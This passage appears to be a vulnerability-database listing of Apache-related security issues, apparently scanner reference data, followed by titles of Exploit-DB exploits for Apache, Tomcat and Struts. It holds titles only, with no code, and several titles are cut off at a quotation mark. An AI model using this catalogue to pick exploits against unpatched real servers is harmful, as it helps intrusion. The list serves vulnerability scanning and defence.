15043| [72438] Apache Tomcat Digest security bypass
15044| [72437] Apache Tomcat Digest security bypass
15045| [72436] Apache Tomcat DIGEST security bypass
15046| [72425] Apache Tomcat parameter denial of service
15047| [72422] Apache Tomcat request object information disclosure
15048| [72377] Apache HTTP Server scoreboard security bypass
15049| [72345] Apache HTTP Server HTTP request denial of service
15050| [72229] Apache Struts ExceptionDelegator command execution
15051| [72089] Apache Struts ParameterInterceptor directory traversal
15052| [72088] Apache Struts CookieInterceptor command execution
15053| [72047] Apache Geronimo hash denial of service
15054| [72016] Apache Tomcat hash denial of service
15055| [71711] Apache Struts OGNL expression code execution
15056| [71654] Apache Struts interfaces security bypass
15057| [71620] Apache ActiveMQ failover denial of service
15058| [71617] Apache HTTP Server mod_proxy module information disclosure
15059| [71508] Apache MyFaces EL security bypass
15060| [71445] Apache HTTP Server mod_proxy security bypass
15061| [71203] Apache Tomcat servlets privilege escalation
15062| [71181] Apache HTTP Server ap_pregsub() denial of service
15063| [71093] Apache HTTP Server ap_pregsub() buffer overflow
15064| [70336] Apache HTTP Server mod_proxy information disclosure
15065| [69804] Apache HTTP Server mod_proxy_ajp denial of service
15066| [69472] Apache Tomcat AJP security bypass
15067| [69396] Apache HTTP Server ByteRange filter denial of service
15068| [69394] Apache Wicket multi window support cross-site scripting
15069| [69176] Apache Tomcat XML information disclosure
15070| [69161] Apache Tomcat jsvc information disclosure
15071| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
15072| [68541] Apache Tomcat sendfile information disclosure
15073| [68420] Apache XML Security denial of service
15074| [68238] Apache Tomcat JMX information disclosure
15075| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
15076| [67804] Apache Subversion control rules information disclosure
15077| [67803] Apache Subversion control rules denial of service
15078| [67802] Apache Subversion baselined denial of service
15079| [67672] Apache Archiva multiple cross-site scripting
15080| [67671] Apache Archiva multiple cross-site request forgery
15081| [67564] Apache APR apr_fnmatch() denial of service
15082| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
15083| [67515] Apache Tomcat annotations security bypass
15084| [67480] Apache Struts s:submit information disclosure
15085| [67414] Apache APR apr_fnmatch() denial of service
15086| [67356] Apache Struts javatemplates cross-site scripting
15087| [67354] Apache Struts Xwork cross-site scripting
15088| [66676] Apache Tomcat HTTP BIO information disclosure
15089| [66675] Apache Tomcat web.xml security bypass
15090| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
15091| [66241] Apache HttpComponents information disclosure
15092| [66154] Apache Tomcat ServletSecurity security bypass
15093| [65971] Apache Tomcat ServletSecurity security bypass
15094| [65876] Apache Subversion mod_dav_svn denial of service
15095| [65343] Apache Continuum unspecified cross-site scripting
15096| [65162] Apache Tomcat NIO connector denial of service
15097| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
15098| [65160] Apache Tomcat HTML Manager interface cross-site scripting
15099| [65159] Apache Tomcat ServletContect security bypass
15100| [65050] Apache CouchDB web-based administration UI cross-site scripting
15101| [64773] Oracle HTTP Server Apache Plugin unauthorized access
15102| [64473] Apache Subversion blame -g denial of service
15103| [64472] Apache Subversion walk() denial of service
15104| [64407] Apache Axis2 CVE-2010-0219 code execution
15105| [63926] Apache Archiva password privilege escalation
15106| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
15107| [63493] Apache Archiva credentials cross-site request forgery
15108| [63477] Apache Tomcat HttpOnly session hijacking
15109| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
15110| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
15111| [62959] Apache Shiro filters security bypass
15112| [62790] Apache Perl cgi module denial of service
15113| [62576] Apache Qpid exchange denial of service
15114| [62575] Apache Qpid AMQP denial of service
15115| [62354] Apache Qpid SSL denial of service
15116| [62235] Apache APR-util apr_brigade_split_line() denial of service
15117| [62181] Apache XML-RPC SAX Parser information disclosure
15118| [61721] Apache Traffic Server cache poisoning
15119| [61202] Apache Derby BUILTIN authentication functionality information disclosure
15120| [61186] Apache CouchDB Futon cross-site request forgery
15121| [61169] Apache CXF DTD denial of service
15122| [61070] Apache Jackrabbit search.jsp SQL injection
15123| [61006] Apache SLMS Quoting cross-site request forgery
15124| [60962] Apache Tomcat time cross-site scripting
15125| [60883] Apache mod_proxy_http information disclosure
15126| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
15127| [60264] Apache Tomcat Transfer-Encoding denial of service
15128| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
15129| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
15130| [59413] Apache mod_proxy_http timeout information disclosure
15131| [59058] Apache MyFaces unencrypted view state cross-site scripting
15132| [58827] Apache Axis2 xsd file include
15133| [58790] Apache Axis2 modules cross-site scripting
15134| [58299] Apache ActiveMQ queueBrowse cross-site scripting
15135| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
15136| [58056] Apache ActiveMQ .jsp source code disclosure
15137| [58055] Apache Tomcat realm name information disclosure
15138| [58046] Apache HTTP Server mod_auth_shadow security bypass
15139| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
15140| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
15141| [57429] Apache CouchDB algorithms information disclosure
15142| [57398] Apache ActiveMQ Web console cross-site request forgery
15143| [57397] Apache ActiveMQ createDestination.action cross-site scripting
15144| [56653] Apache HTTP Server DNS spoofing
15145| [56652] Apache HTTP Server DNS cross-site scripting
15146| [56625] Apache HTTP Server request header information disclosure
15147| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
15148| [56623] Apache HTTP Server mod_proxy_ajp denial of service
15149| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
15150| [55857] Apache Tomcat WAR files directory traversal
15151| [55856] Apache Tomcat autoDeploy attribute security bypass
15152| [55855] Apache Tomcat WAR directory traversal
15153| [55210] Intuit component for Joomla! Apache information disclosure
15154| [54533] Apache Tomcat 404 error page cross-site scripting
15155| [54182] Apache Tomcat admin default password
15156| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
15157| [53666] Apache HTTP Server Solaris pollset support denial of service
15158| [53650] Apache HTTP Server HTTP basic-auth module security bypass
15159| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
15160| [53041] mod_proxy_ftp module for Apache denial of service
15161| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
15162| [51953] Apache Tomcat Path Disclosure
15163| [51952] Apache Tomcat Path Traversal
15164| [51951] Apache stronghold-status Information Disclosure
15165| [51950] Apache stronghold-info Information Disclosure
15166| [51949] Apache PHP Source Code Disclosure
15167| [51948] Apache Multiviews Attack
15168| [51946] Apache JServ Environment Status Information Disclosure
15169| [51945] Apache error_log Information Disclosure
15170| [51944] Apache Default Installation Page Pattern Found
15171| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
15172| [51942] Apache AXIS XML External Entity File Retrieval
15173| [51941] Apache AXIS Sample Servlet Information Leak
15174| [51940] Apache access_log Information Disclosure
15175| [51626] Apache mod_deflate denial of service
15176| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
15177| [51365] Apache Tomcat RequestDispatcher security bypass
15178| [51273] Apache HTTP Server Incomplete Request denial of service
15179| [51195] Apache Tomcat XML information disclosure
15180| [50994] Apache APR-util xml/apr_xml.c denial of service
15181| [50993] Apache APR-util apr_brigade_vprintf denial of service
15182| [50964] Apache APR-util apr_strmatch_precompile() denial of service
15183| [50930] Apache Tomcat j_security_check information disclosure
15184| [50928] Apache Tomcat AJP denial of service
15185| [50884] Apache HTTP Server XML ENTITY denial of service
15186| [50808] Apache HTTP Server AllowOverride privilege escalation
15187| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
15188| [50059] Apache mod_proxy_ajp information disclosure
15189| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
15190| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
15191| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
15192| [49921] Apache ActiveMQ Web interface cross-site scripting
15193| [49898] Apache Geronimo Services/Repository directory traversal
15194| [49725] Apache Tomcat mod_jk module information disclosure
15195| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
15196| [49712] Apache Struts unspecified cross-site scripting
15197| [49213] Apache Tomcat cal2.jsp cross-site scripting
15198| [48934] Apache Tomcat POST doRead method information disclosure
15199| [48211] Apache Tomcat header HTTP request smuggling
15200| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
15201| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
15202| [47709] Apache Roller "
15203| [47104] Novell Netware ApacheAdmin console security bypass
15204| [47086] Apache HTTP Server OS fingerprinting unspecified
15205| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
15206| [45791] Apache Tomcat RemoteFilterValve security bypass
15207| [44435] Oracle WebLogic Apache Connector buffer overflow
15208| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15209| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15210| [44156] Apache Tomcat RequestDispatcher directory traversal
15211| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15212| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15213| [42987] Apache HTTP Server mod_proxy module denial of service
15214| [42915] Apache Tomcat JSP files path disclosure
15215| [42914] Apache Tomcat MS-DOS path disclosure
15216| [42892] Apache Tomcat unspecified unauthorized access
15217| [42816] Apache Tomcat Host Manager cross-site scripting
15218| [42303] Apache 403 error cross-site scripting
15219| [41618] Apache-SSL ExpandCert() authentication bypass
15220| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15221| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15222| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15223| [40562] Apache Geronimo init information disclosure
15224| [40478] Novell Web Manager webadmin-apache.conf security bypass
15225| [40411] Apache Tomcat exception handling information disclosure
15226| [40409] Apache Tomcat native (APR based) connector weak security
15227| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15228| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15229| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15230| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15231| [39804] Apache Tomcat SingleSignOn information disclosure
15232| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15233| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15234| [39608] Apache HTTP Server balancer manager cross-site request forgery
15235| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15236| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15237| [39472] Apache HTTP Server mod_status cross-site scripting
15238| [39201] Apache Tomcat JULI logging weak security
15239| [39158] Apache HTTP Server Windows SMB shares information disclosure
15240| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15241| [38951] Apache::AuthCAS Perl module cookie SQL injection
15242| [38800] Apache HTTP Server 413 error page cross-site scripting
15243| [38211] Apache Geronimo SQLLoginModule authentication bypass
15244| [37243] Apache Tomcat WebDAV directory traversal
15245| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15246| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15247| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15248| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15249| [36782] Apache Geronimo MEJB unauthorized access
15250| [36586] Apache HTTP Server UTF-7 cross-site scripting
15251| [36468] Apache Geronimo LoginModule security bypass
15252| [36467] Apache Tomcat functions.jsp cross-site scripting
15253| [36402] Apache Tomcat calendar cross-site request forgery
15254| [36354] Apache HTTP Server mod_proxy module denial of service
15255| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15256| [36336] Apache Derby lock table privilege escalation
15257| [36335] Apache Derby schema privilege escalation
15258| [36006] Apache Tomcat "
15259| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15260| [35999] Apache Tomcat \"
15261| [35795] Apache Tomcat CookieExample cross-site scripting
15262| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15263| [35384] Apache HTTP Server mod_cache module denial of service
15264| [35097] Apache HTTP Server mod_status module cross-site scripting
15265| [35095] Apache HTTP Server Prefork MPM module denial of service
15266| [34984] Apache HTTP Server recall_headers information disclosure
15267| [34966] Apache HTTP Server MPM content spoofing
15268| [34965] Apache HTTP Server MPM information disclosure
15269| [34963] Apache HTTP Server MPM multiple denial of service
15270| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15271| [34869] Apache Tomcat JSP example Web application cross-site scripting
15272| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15273| [34496] Apache Tomcat JK Connector security bypass
15274| [34377] Apache Tomcat hello.jsp cross-site scripting
15275| [34212] Apache Tomcat SSL configuration security bypass
15276| [34210] Apache Tomcat Accept-Language cross-site scripting
15277| [34209] Apache Tomcat calendar application cross-site scripting
15278| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15279| [34167] Apache Axis WSDL file path disclosure
15280| [34068] Apache Tomcat AJP connector information disclosure
15281| [33584] Apache HTTP Server suEXEC privilege escalation
15282| [32988] Apache Tomcat proxy module directory traversal
15283| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15284| [32708] Debian Apache tty privilege escalation
15285| [32441] ApacheStats extract() PHP call unspecified
15286| [32128] Apache Tomcat default account
15287| [31680] Apache Tomcat RequestParamExample cross-site scripting
15288| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15289| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15290| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15291| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15292| [29550] Apache mod_tcl set_var() format string
15293| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15294| [28357] Apache HTTP Server mod_alias script source information disclosure
15295| [28063] Apache mod_rewrite off-by-one buffer overflow
15296| [27902] Apache Tomcat URL information disclosure
15297| [26786] Apache James SMTP server denial of service
15298| [25680] libapache2 /tmp/svn file upload
15299| [25614] Apache Struts lookupMap cross-site scripting
15300| [25613] Apache Struts ActionForm denial of service
15301| [25612] Apache Struts isCancelled() security bypass
15302| [24965] Apache mod_python FileSession command execution
15303| [24716] Apache James spooler memory leak denial of service
15304| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15305| [24158] Apache Geronimo jsp-examples cross-site scripting
15306| [24030] Apache auth_ldap module multiple format strings
15307| [24008] Apache mod_ssl custom error message denial of service
15308| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15309| [23612] Apache mod_imap referer field cross-site scripting
15310| [23173] Apache Struts error message cross-site scripting
15311| [22942] Apache Tomcat directory listing denial of service
15312| [22858] Apache Multi-Processing Module code allows denial of service
15313| [22602] RHSA-2005:582 updates for Apache httpd not installed
15314| [22520] Apache mod-auth-shadow "
15315| [22466] ApacheTop symlink
15316| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15317| [22006] Apache HTTP Server byte-range filter denial of service
15318| [21567] Apache mod_ssl off-by-one buffer overflow
15319| [21195] Apache HTTP Server header HTTP request smuggling
15320| [20383] Apache HTTP Server htdigest buffer overflow
15321| [19681] Apache Tomcat AJP12 request denial of service
15322| [18993] Apache HTTP server check_forensic symlink attack
15323| [18790] Apache Tomcat Manager cross-site scripting
15324| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15325| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15326| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15327| [17961] Apache Web server ServerTokens has not been set
15328| [17930] Apache HTTP Server HTTP GET request denial of service
15329| [17785] Apache mod_include module buffer overflow
15330| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15331| [17473] Apache HTTP Server Satisfy directive allows access to resources
15332| [17413] Apache htpasswd buffer overflow
15333| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15334| [17382] Apache HTTP Server IPv6 apr_util denial of service
15335| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15336| [17273] Apache HTTP Server speculative mode denial of service
15337| [17200] Apache HTTP Server mod_ssl denial of service
15338| [16890] Apache HTTP Server server-info request has been detected
15339| [16889] Apache HTTP Server server-status request has been detected
15340| [16705] Apache mod_ssl format string attack
15341| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15342| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15343| [16230] Apache HTTP Server PHP denial of service
15344| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15345| [15958] Apache HTTP Server authentication modules memory corruption
15346| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15347| [15540] Apache HTTP Server socket starvation denial of service
15348| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15349| [15422] Apache HTTP Server mod_access information disclosure
15350| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15351| [15293] Apache for Cygwin "
15352| [15065] Apache-SSL has a default password
15353| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15354| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15355| [14751] Apache Mod_python output filter information disclosure
15356| [14125] Apache HTTP Server mod_userdir module information disclosure
15357| [14075] Apache HTTP Server mod_php file descriptor leak
15358| [13703] Apache HTTP Server account
15359| [13689] Apache HTTP Server configuration allows symlinks
15360| [13688] Apache HTTP Server configuration allows SSI
15361| [13687] Apache HTTP Server Server: header value
15362| [13685] Apache HTTP Server ServerTokens value
15363| [13684] Apache HTTP Server ServerSignature value
15364| [13672] Apache HTTP Server config allows directory autoindexing
15365| [13671] Apache HTTP Server default content
15366| [13670] Apache HTTP Server config file directive references outside content root
15367| [13668] Apache HTTP Server httpd not running in chroot environment
15368| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15369| [13664] Apache HTTP Server config file contains ScriptAlias entry
15370| [13663] Apache HTTP Server CGI support modules loaded
15371| [13661] Apache HTTP Server config file contains AddHandler entry
15372| [13660] Apache HTTP Server 500 error page not CGI script
15373| [13659] Apache HTTP Server 413 error page not CGI script
15374| [13658] Apache HTTP Server 403 error page not CGI script
15375| [13657] Apache HTTP Server 401 error page not CGI script
15376| [13552] Apache HTTP Server mod_cgid module information disclosure
15377| [13550] Apache GET request directory traversal
15378| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15379| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15380| [13429] Apache Tomcat non-HTTP request denial of service
15381| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15382| [13295] Apache weak password encryption
15383| [13254] Apache Tomcat .jsp cross-site scripting
15384| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15385| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15386| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15387| [12662] Apache HTTP Server rotatelogs denial of service
15388| [12554] Apache Tomcat stores password in plain text
15389| [12553] Apache HTTP Server redirects and subrequests denial of service
15390| [12552] Apache HTTP Server FTP proxy server denial of service
15391| [12551] Apache HTTP Server prefork MPM denial of service
15392| [12550] Apache HTTP Server weaker than expected encryption
15393| [12549] Apache HTTP Server type-map file denial of service
15394| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15395| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15396| [12091] Apache HTTP Server apr_password_validate denial of service
15397| [12090] Apache HTTP Server apr_psprintf code execution
15398| [11804] Apache HTTP Server mod_access_referer denial of service
15399| [11750] Apache HTTP Server could leak sensitive file descriptors
15400| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15401| [11703] Apache long slash path allows directory listing
15402| [11695] Apache HTTP Server LF (Line Feed) denial of service
15403| [11694] Apache HTTP Server filestat.c denial of service
15404| [11438] Apache HTTP Server MIME message boundaries information disclosure
15405| [11412] Apache HTTP Server error log terminal escape sequence injection
15406| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15407| [11195] Apache Tomcat web.xml could be used to read files
15408| [11194] Apache Tomcat URL appended with a null character could list directories
15409| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15410| [11126] Apache HTTP Server illegal character file disclosure
15411| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15412| [11124] Apache HTTP Server DOS device name denial of service
15413| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15414| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15415| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15416| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15417| [10499] Apache HTTP Server WebDAV HTTP POST view source
15418| [10457] Apache HTTP Server mod_ssl "
15419| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15420| [10414] Apache HTTP Server htdigest multiple buffer overflows
15421| [10413] Apache HTTP Server htdigest temporary file race condition
15422| [10412] Apache HTTP Server htpasswd temporary file race condition
15423| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15424| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15425| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15426| [10280] Apache HTTP Server shared memory scorecard overwrite
15427| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15428| [10241] Apache HTTP Server Host: header cross-site scripting
15429| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15430| [10208] Apache HTTP Server mod_dav denial of service
15431| [10206] HP VVOS Apache mod_ssl denial of service
15432| [10200] Apache HTTP Server stderr denial of service
15433| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15434| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15435| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15436| [10098] Slapper worm targets OpenSSL/Apache systems
15437| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15438| [9875] Apache HTTP Server .var file request could disclose installation path
15439| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15440| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15441| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15442| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15443| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15444| [9396] Apache Tomcat null character to threads denial of service
15445| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15446| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15447| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15448| [8932] Apache Tomcat example class information disclosure
15449| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15450| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15451| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15452| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15453| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15454| [8400] Apache HTTP Server mod_frontpage buffer overflows
15455| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15456| [8308] Apache "
15457| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15458| [8119] Apache and PHP OPTIONS request reveals "
15459| [8054] Apache is running on the system
15460| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15461| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15462| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15463| [7836] Apache HTTP Server log directory denial of service
15464| [7815] Apache for Windows "
15465| [7810] Apache HTTP request could result in unexpected behavior
15466| [7599] Apache Tomcat reveals installation path
15467| [7494] Apache "
15468| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15469| [7363] Apache Web Server hidden HTTP requests
15470| [7249] Apache mod_proxy denial of service
15471| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15472| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15473| [7059] Apache "
15474| [7057] Apache "
15475| [7056] Apache "
15476| [7055] Apache "
15477| [7054] Apache "
15478| [6997] Apache Jakarta Tomcat error message may reveal information
15479| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15480| [6970] Apache crafted HTTP request could reveal the internal IP address
15481| [6921] Apache long slash path allows directory listing
15482| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15483| [6527] Apache Web Server for Windows and OS2 denial of service
15484| [6316] Apache Jakarta Tomcat may reveal JSP source code
15485| [6305] Apache Jakarta Tomcat directory traversal
15486| [5926] Linux Apache symbolic link
15487| [5659] Apache Web server discloses files when used with php script
15488| [5310] Apache mod_rewrite allows attacker to view arbitrary files
15489| [5204] Apache WebDAV directory listings
15490| [5197] Apache Web server reveals CGI script source code
15491| [5160] Apache Jakarta Tomcat default installation
15492| [5099] Trustix Secure Linux installs Apache with world writable access
15493| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
15494| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
15495| [4931] Apache source.asp example file allows users to write to files
15496| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
15497| [4205] Apache Jakarta Tomcat delivers file contents
15498| [2084] Apache on Debian by default serves the /usr/doc directory
15499| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
15500| [697] Apache HTTP server beck exploit
15501| [331] Apache cookies buffer overflow
15502|
15503| Exploit-DB - https://www.exploit-db.com:
15504| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
15505| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15506| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15507| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
15508| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
15509| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
15510| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
15511| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
15512| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
15513| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15514| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
15515| [29859] Apache Roller OGNL Injection
15516| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
15517| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
15518| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
15519| [29290] Apache / PHP 5.x Remote Code Execution Exploit
15520| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
15521| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
15522| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
15523| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
15524| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
15525| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
15526| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
15527| [27096] Apache Geronimo 1.0 Error Page XSS
15528| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
15529| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
15530| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
15531| [25986] Plesk Apache Zeroday Remote Exploit
15532| [25980] Apache Struts includeParams Remote Code Execution
15533| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
15534| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
15535| [24874] Apache Struts ParametersInterceptor Remote Code Execution
15536| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
15537| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
15538| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
15539| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
15540| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
15541| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
15542| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
15543| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
15544| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
15545| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
15546| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
15547| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
15548| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
15549| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
15550| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
